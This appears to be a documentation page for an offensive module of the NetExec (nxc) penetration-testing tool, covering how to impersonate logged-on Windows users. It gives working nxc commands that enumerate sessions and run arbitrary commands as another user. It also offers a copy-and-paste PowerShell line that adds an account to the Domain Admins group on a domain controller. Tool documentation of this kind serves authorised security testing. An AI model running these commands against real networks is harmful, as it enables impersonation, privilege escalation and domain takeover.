🆕Impersonate logged-on Users

Use Sessions from logged-on Users to execute arbitrary commands using schtask_as

You need at least local admin privilege on the remote target

The Module schtask_as can execute commands on behalf on other users which has sessions on the target, thanks to the contribution from @Defte_.

nxc smb <ip> -u <localAdmin> -p <password> --loggedon-users

nxc smb <ip> -u <localAdmin> -p <password> -M schtask_as -o USER=<logged-on-user> CMD=<cmd-command>

Custom command to add an user to the domain admin group for easy copy&pasting:

powershell.exe \"Invoke-Command -ComputerName DC01 -ScriptBlock {Add-ADGroupMember -Identity 'Domain Admins' -Members USER.NAME}\"

Last updated 7 months ago